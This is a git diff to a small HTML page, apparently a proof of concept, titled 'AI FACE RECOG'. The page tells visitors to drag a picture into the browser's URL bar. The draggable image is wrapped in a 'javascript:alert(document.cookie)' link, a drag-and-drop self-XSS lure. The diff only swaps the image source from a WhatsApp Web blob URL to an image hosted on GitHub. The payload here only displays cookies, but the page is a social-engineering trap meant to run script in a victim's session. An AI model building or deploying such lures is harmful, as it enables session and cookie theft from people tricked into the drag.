--- a/dropme.html
+++ b/dropme.html
@@ -16,7 +16,7 @@
 	<h1>AI FACE RECOG</h1>
 	<p>drag & drop Picture to url bar</p>
 	<div id='drag' draggable="true">
-		<a href="javascript:alert(document.cookie)"><img src="blob:https://web.whatsapp.com/866836b2-6817-434d-8307-900c5ff392c9"></a>
+		<a href="javascript:alert(document.cookie)"><img src="https://raw.githubusercontent.com/ghostxsec/spoof/refs/heads/main/xxx.png"></a>
 	</div>
 
 <script>
